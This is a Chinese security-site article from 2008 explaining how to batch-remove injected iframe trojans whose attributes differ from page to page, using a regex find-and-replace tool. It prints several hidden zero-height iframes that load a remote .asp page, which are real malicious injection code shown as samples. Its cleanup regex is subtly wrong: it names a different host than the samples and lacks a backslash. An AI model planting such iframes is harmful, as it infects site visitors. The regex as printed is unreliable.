频道栏目
首页 > 资讯 > 网站安全 > 正文

每个页面挂马内容都不相同,教如何批量清理

08-12-15        来源:[db:作者]  
收藏   我要投稿
编外:可能很多人都会在找这个解决方法

补天.abu.原创,转摘请注明。

网站被批量挂马是经常遇到的事情,一般用批量替换工具很方便就可以批量删除相关代码,但是如果一个网站里面每个页面都被放置了木马,而且代码还都不一样。这种情况如何处理?

因为没有一个页面挂的马是相同的,所以根本删不掉。前几天我的一个朋友就遇到了这个问题。

他诉苦道服务器上一个网站被批量挂了木马,仔细一看居然每个页面挂的木马都不一样。

我检查了一下是类似这样的情况:

页面一的木马是:
<ifraME src=http://sb.3322.org/isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>

页面二的木马是:
<ifraME src=http://sb.3322.org/isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>

页面三的木马是:
<ifraME src=http://sb.3322.org/isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>

……

仔细看,虽然每个页面上挂的木马不同,但是还是有一定规律的。

这时候,我就在郁闷了,要是能有一个支持正则的批量替换工具就好了。还好补天的areone帮忙,给我介绍了一个小工具,恰恰可以满足这个要求。

这里有下载:
【下载】AFR (Advanced Find and Replace) 中文绿色版 支持正则可用来批量删除网页


打开AFR工具,选择批量替换:

搜索内容部分填写:

<ifraME src=http://88lai.3322.org/u.asp widTH=50 height=0 name=d{4} naMe=2 boRdeR=0></ifRame>

替换为空 即可。

 

注意上面语句中红色部分,就是正则表达式了。通过这种方法,就可以批量对木马进行删除了。

很快,清除了4百多个页面上的木马。大功告成。


正则表达式在平时技术方面的应用中用的很多,后面我也会给大家找一些这方面的教材。

相关TAG标签
上一篇:Microsoft SQL Server sp_replwritetovarbin远程堆溢出漏洞
下一篇:入侵基于java Struts的JSP网站(续)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站